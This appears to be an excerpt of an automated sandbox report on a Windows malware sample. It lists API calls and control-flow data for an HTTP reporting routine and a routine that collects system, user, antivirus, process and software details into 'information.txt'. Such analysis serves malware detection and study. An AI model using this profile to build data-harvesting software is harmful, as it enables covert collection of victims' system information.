                                                                                                                                                                                                control_flow_graph 359 405183-405252 _EH_prolog call 40e949 call 403a76 call 40e912 * 5 call 40eb3c InternetOpenA StrCmpCA 376 405254 359->376 377 405256-405259 359->377 376->377 378 405924-40594a InternetCloseHandle call 40eb3c call 40628e 377->378 379 40525f-4053dd call 40fb47 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40ea17 call 40e9d0 call 40e97d * 2 InternetConnectA 377->379 389 40594c-405979 call 40e986 call 40ea8b call 40e9d0 call 40e97d 378->389 390 40597e-4059eb call 40fa7f * 2 call 40e97d * 4 call 401061 call 40e97d 378->390 379->378 459 4053e3-405414 HttpOpenRequestA 379->459 389->390 460 40541a-40541c 459->460 461 40591b-40591e InternetCloseHandle 459->461 462 405434-4058c1 call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 402101 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea17 call 40e9d0 call 40e97d call 40eb3c lstrlenA call 40eb3c lstrlenA GetProcessHeap HeapAlloc call 40eb3c lstrlenA call 40eb3c memcpy call 40eb3c lstrlenA call 40eb3c * 2 lstrlenA memcpy call 40eb3c lstrlenA call 40eb3c HttpSendRequestA 460->462 463 40541e-40542e InternetSetOptionA 460->463 461->378 624 4058fd-405912 InternetReadFile 462->624 463->462 625 4058c3-4058c8 624->625 626 405914-405915 InternetCloseHandle 624->626 625->626 627 4058ca-4058f8 call 40ea8b call 40e9d0 call 40e97d 625->627 626->461 627->624
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00405188
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 00403A76: _EH_prolog.MSVCRT ref: 00403A7B
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AAD
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB6
                                                                                                                                                                                                  • Part of subcall function 00403A76: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABF
                                                                                                                                                                                                  • Part of subcall function 00403A76: lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403AD9
                                                                                                                                                                                                  • Part of subcall function 00403A76: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403AE9
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405233
                                                                                                                                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004053D2
                                                                                                                                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00405409
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00424B20,00000000), ref: 00405818
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00405829
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405833
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040583A
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040584B
                                                                                                                                                                                                • memcpy.MSVCRT ref: 0040585C
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040586D
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405886
                                                                                                                                                                                                • memcpy.MSVCRT ref: 0040588F
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004058A2
                                                                                                                                                                                                • HttpSendRequestA.WININET(?,00000000,00000000), ref: 004058B6
                                                                                                                                                                                                • InternetReadFile.WININET(?,?,000000C7,?), ref: 0040590A
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00405915
                                                                                                                                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040542E
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 0040591E
                                                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 00405927
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?), ref: 0040524A
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                • String ID: "$"$"$)$------$------$------$------$build_id$mode
                                                                                                                                                                                                • API String ID: 2237346945-290892794
                                                                                                                                                                                                • Opcode ID: 5155bd4e3d79fbc8704a977eba542c059905585330282d930efc31fbda67e626
                                                                                                                                                                                                • Instruction ID: 39c8da72d65292ee7a9aeeff91b228c6242dc23d33435bb28ce9fb46c7ef3f30
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5155bd4e3d79fbc8704a977eba542c059905585330282d930efc31fbda67e626
                                                                                                                                                                                                • Instruction Fuzzy Hash: F04241B1800148EADB05EBE2C956EEEBBB9AF19304F1044AEE541731C2DB795B18CB75
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0041361F Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1023stringCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 633 41361f-414461 _EH_prolog call 40e912 call 40ea8b call 40e9d0 call 40e97d call 4020e7 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ec27 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40f462 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40f4ef call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40f52a call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d GetCurrentProcessId call 40ffec call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40f698 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40f7ab call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40f934 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ebec call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ebba call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40f3ed call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ecd4 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ec27 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ec81 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ee07 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40eea3 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ee70 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ef70 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40efd9 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40f310 call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40ea8b call 40e9d0 call 40e97d call 40f0be call 40ea17 call 40e9d0 call 40e97d * 2 call 40f0be call 40ea17 call 40e9d0 call 40e97d * 2 call 40ea8b call 40e9d0 call 40e97d call 40eb3c lstrlenA call 40eb3c call 40e912 call 4010b1 call 413452 call 40e97d * 2 call 401061
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00413624
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EC27: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042548E), ref: 0040EC35
                                                                                                                                                                                                  • Part of subcall function 0040EC27: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042548E), ref: 0040EC3C
                                                                                                                                                                                                  • Part of subcall function 0040EC27: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042548E), ref: 0040EC48
                                                                                                                                                                                                  • Part of subcall function 0040EC27: wsprintfA.USER32 ref: 0040EC73
                                                                                                                                                                                                  • Part of subcall function 0040F462: memset.MSVCRT ref: 0040F488
                                                                                                                                                                                                  • Part of subcall function 0040F462: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,0042548E,?,?,00000000), ref: 0040F4A4
                                                                                                                                                                                                  • Part of subcall function 0040F462: RegQueryValueExA.KERNEL32(0042548E,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0040F4C3
                                                                                                                                                                                                  • Part of subcall function 0040F462: CharToOemA.USER32(?,?), ref: 0040F4E0
                                                                                                                                                                                                  • Part of subcall function 0040F4EF: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040F500
                                                                                                                                                                                                  • Part of subcall function 0040F52A: _EH_prolog.MSVCRT ref: 0040F52F
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040F552
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F584
                                                                                                                                                                                                  • Part of subcall function 0040F52A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F5C7
                                                                                                                                                                                                  • Part of subcall function 0040F52A: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F5CE
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00425538,00000000,?,00000000,00000000,?,HWID: ,00000000,?,0042552C,00000000), ref: 00413952
                                                                                                                                                                                                  • Part of subcall function 0040FFEC: OpenProcess.KERNEL32(00000410,00000000,b9A), ref: 00410004
                                                                                                                                                                                                  • Part of subcall function 0040FFEC: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041001F
                                                                                                                                                                                                  • Part of subcall function 0040FFEC: CloseHandle.KERNEL32(00000000), ref: 00410026
                                                                                                                                                                                                  • Part of subcall function 0040F698: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory), ref: 0040F6AC
                                                                                                                                                                                                  • Part of subcall function 0040F698: HeapAlloc.KERNEL32(00000000,?,?,?,00413A47,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F6B3
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: _EH_prolog.MSVCRT ref: 0040F7B0
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: CoInitializeEx.OLE32(00000000,00000000,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000), ref: 0040F7C0
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,?,0042555C), ref: 0040F7D1
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: CoCreateInstance.OLE32(00427238,00000000,00000001,00427168,?,?,?,?,?,?,?,0042555C,00000000,?,Work Dir: In memory,00000000), ref: 0040F7EB
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,?,0042555C,00000000), ref: 0040F821
                                                                                                                                                                                                  • Part of subcall function 0040F7AB: VariantInit.OLEAUT32(?), ref: 0040F87C
                                                                                                                                                                                                  • Part of subcall function 0040F934: _EH_prolog.MSVCRT ref: 0040F939
                                                                                                                                                                                                  • Part of subcall function 0040F934: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000,?,00000000), ref: 0040F949
                                                                                                                                                                                                  • Part of subcall function 0040F934: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544), ref: 0040F95A
                                                                                                                                                                                                  • Part of subcall function 0040F934: CoCreateInstance.OLE32(00427238,00000000,00000001,00427168,?,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000,?,00000000), ref: 0040F974
                                                                                                                                                                                                  • Part of subcall function 0040F934: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00425544,00000000), ref: 0040F9AA
                                                                                                                                                                                                  • Part of subcall function 0040F934: VariantInit.OLEAUT32(?), ref: 0040F9F9
                                                                                                                                                                                                  • Part of subcall function 0040EBEC: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,00413BEE,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000), ref: 0040EBF8
                                                                                                                                                                                                  • Part of subcall function 0040EBEC: HeapAlloc.KERNEL32(00000000,?,?,00413BEE,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ), ref: 0040EBFF
                                                                                                                                                                                                  • Part of subcall function 0040EBEC: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040EC13
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041623D,00425507), ref: 0040EBC6
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: HeapAlloc.KERNEL32(00000000,?,?,?,0041623D,00425507), ref: 0040EBCD
                                                                                                                                                                                                  • Part of subcall function 0040EBBA: GetUserNameA.ADVAPI32(00000000,?), ref: 0040EBE1
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0040F402
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040F40D
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040F418
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: ReleaseDC.USER32(00000000,00000000), ref: 0040F423
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00413CF0,?,00000000,?,Display Resolution: ,00000000,?,004255B0,00000000,?), ref: 0040F42F
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00413CF0,?,00000000,?,Display Resolution: ,00000000,?,004255B0,00000000,?,00000000), ref: 0040F436
                                                                                                                                                                                                  • Part of subcall function 0040F3ED: wsprintfA.USER32 ref: 0040F448
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: _EH_prolog.MSVCRT ref: 0040ECD9
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: GetKeyboardLayoutList.USER32(00000000,00000000,004251F7,00000000,?,00000000), ref: 0040ED0B
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040ED19
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040ED24
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040ED4E
                                                                                                                                                                                                  • Part of subcall function 0040ECD4: LocalFree.KERNEL32(?), ref: 0040EDF2
                                                                                                                                                                                                  • Part of subcall function 0040EC81: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ), ref: 0040EC92
                                                                                                                                                                                                  • Part of subcall function 0040EC81: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040EC99
                                                                                                                                                                                                  • Part of subcall function 0040EC81: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,0042558C,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040ECA8
                                                                                                                                                                                                  • Part of subcall function 0040EC81: wsprintfA.USER32 ref: 0040ECC6
                                                                                                                                                                                                  • Part of subcall function 0040EE07: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042560C), ref: 0040EE1B
                                                                                                                                                                                                  • Part of subcall function 0040EE07: HeapAlloc.KERNEL32(00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042560C,00000000,?), ref: 0040EE22
                                                                                                                                                                                                  • Part of subcall function 0040EE07: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040EE40
                                                                                                                                                                                                  • Part of subcall function 0040EE07: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413F6C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040EE5C
                                                                                                                                                                                                  • Part of subcall function 0040EEA3: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040EEF6
                                                                                                                                                                                                  • Part of subcall function 0040EEA3: wsprintfA.USER32 ref: 0040EF3C
                                                                                                                                                                                                  • Part of subcall function 0040EE70: GetSystemInfo.KERNEL32(00000000), ref: 0040EE7D
                                                                                                                                                                                                  • Part of subcall function 0040EE70: wsprintfA.USER32 ref: 0040EE92
                                                                                                                                                                                                  • Part of subcall function 0040EF70: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000,?,Windows: ,00000000,?,0042555C,00000000,?,Work Dir: In memory,00000000,?,00425544), ref: 0040EF7E
                                                                                                                                                                                                  • Part of subcall function 0040EF70: HeapAlloc.KERNEL32(00000000), ref: 0040EF85
                                                                                                                                                                                                  • Part of subcall function 0040EF70: GlobalMemoryStatusEx.KERNEL32 ref: 0040EFA5
                                                                                                                                                                                                  • Part of subcall function 0040EF70: wsprintfA.USER32 ref: 0040EFCB
                                                                                                                                                                                                  • Part of subcall function 0040EFD9: _EH_prolog.MSVCRT ref: 0040EFDE
                                                                                                                                                                                                  • Part of subcall function 0040EFD9: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0040F09F
                                                                                                                                                                                                  • Part of subcall function 0040F310: _EH_prolog.MSVCRT ref: 0040F315
                                                                                                                                                                                                  • Part of subcall function 0040F310: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F350
                                                                                                                                                                                                  • Part of subcall function 0040F310: Process32First.KERNEL32(00000000,00000128), ref: 0040F361
                                                                                                                                                                                                  • Part of subcall function 0040F310: Process32Next.KERNEL32(?,00000128), ref: 0040F3C9
                                                                                                                                                                                                  • Part of subcall function 0040F310: CloseHandle.KERNEL32(?,?,00000000), ref: 0040F3D6
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: _EH_prolog.MSVCRT ref: 0040F0C3
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042520F,00000000,00000000), ref: 0040F10B
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040F155
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: wsprintfA.USER32 ref: 0040F17F
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040F19C
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040F1C6
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: lstrlenA.KERNEL32(?), ref: 0040F1DB
                                                                                                                                                                                                  • Part of subcall function 0040F0BE: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00425240), ref: 0040F25B
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,00425684,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00425674), ref: 004143E6
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $V$Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                • API String ID: 722754166-310184570
